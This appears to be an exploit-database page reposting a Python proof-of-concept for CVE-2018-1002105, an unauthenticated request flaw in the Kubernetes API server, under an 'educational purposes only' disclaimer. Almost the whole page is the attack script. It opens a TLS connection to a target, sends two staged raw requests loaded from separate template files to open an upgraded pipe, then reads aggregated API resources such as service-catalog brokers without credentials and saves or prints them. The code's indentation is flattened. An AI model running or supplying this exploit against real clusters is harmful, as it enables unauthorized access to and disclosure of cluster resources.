Kubernetes (unauthenticated) arbitrary requests Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-12-10 | Type : remote | Platform : multiple
This exploit / vulnerability Kubernetes (unauthenticated) arbitrary requests is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

#!/usr/bin/env python3
import argparse
from ssl import wrap_socket
from json import loads, dumps
from socket import create_connection


def request_stage_1(base, version, target):

stage_1 = ""

with open('ustage_1', 'r') as stage_1_fd:
stage_1 = stage_1_fd.read()

return stage_1.format(base, version, target
).encode('utf-8')


def request_stage_2(base, version, target_api, target):

stage_2 = ""

with open('ustage_2', 'r') as stage_2_fd:
stage_2 = stage_2_fd.read()

return stage_2.format(base, version, target_api, target,
).encode('utf-8')


def read_data(ssock):

data = []
data_incoming = True

while data_incoming:
data_in = ssock.recv(4096)

if not data_in:
data_incoming = False

elif data_in.find(b'\n\r\n0\r\n\r\n') != -1:
data_incoming = False

offset_1 = data_in.find(b'{')
offset_2 = data_in.find(b'}\n')

if offset_1 != -1 and offset_2 != -1:
data_in = data_in[offset_1-1:offset_2+1]

elif offset_1 != -1:
data_in = data_in[offset_1-1:]

elif offset_2 != -1:
data_in = data_in[:offset_2-1]

data.append(data_in)

return data


def run_exploit(target, stage_1, stage_2, filename, json):

host, port = target.split(':')

with create_connection((host, port)) as sock:

with wrap_socket(sock) as ssock:
print('[*] Building pipe ...')
ssock.send(stage_1)

data_in = ssock.recv(15)

if b'HTTP/1.1 200 OK' in data_in:
print('[+] Pipe opened :D')
read_data(ssock)

else:
print('[-] Not sure if this went well...')

print(f"[*] Attempting to access url")

ssock.send(stage_2)
data_in = ssock.recv(15)

if b'HTTP/1.1 200 OK' in data_in:
print('[+] Pipe opened :D')

data = read_data(ssock)

return data


def parse_output(data, json, filename):

if json:
j = loads(''.join(i.decode('utf-8')
for i in data))

data = dumps(j, indent=4)

if filename:
mode = 'w+'

else:
mode = 'wb+'

if filename:
print(f"[*] Writing output to {filename} ....")

with open(filename, mode) as fd:
if json:
fd.write(data)

else:
for msg in data:
fd.write(msg)

print('[+] Done!')

else:
if json:
print(data)

else:
print(''.join(msg.decode('unicode_escape') for msg in data))


def main():

parser = argparse.ArgumentParser(description='Unauthenticated PoC for'
' CVE-2018-1002105')
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')

required.add_argument('--target', '-t', dest='target', type=str,
help='API server target:port', required=True)
required.add_argument('--api-base', '-b', dest='base', type=str,
help='Target API name i.e. "servicecatalog.k8s.io"',
default="servicecatalog.k8s.io")
required.add_argument('--api-target', '-u', dest='target_api', type=str,
help='API to access i.e. "clusterservicebrokers"',
default="clusterservicebrokers")

optional.add_argument('--api-version', '-a', dest='version', type=str,
help='API version to use i.e. "v1beta1"',
default="v1beta1")
optional.add_argument('--json', '-j', dest='json', action='store_true',
help='Print json output', default=False)
optional.add_argument('--filename', '-f', dest='filename', type=str,
help='File to save output to', default=False)

args = parser.parse_args()

if args.target.find(':') == -1:
print("f[-] invalid target {args.target}")
return False

stage1 = request_stage_1(args.base, args.version, args.target)

stage2 = request_stage_2(args.base, args.version, args.target_api,
args.target)

output = run_exploit(args.target, stage1, stage2, args.filename, args.json)

parse_output(output, args.json, args.filename)


if __name__ == '__main__':
main()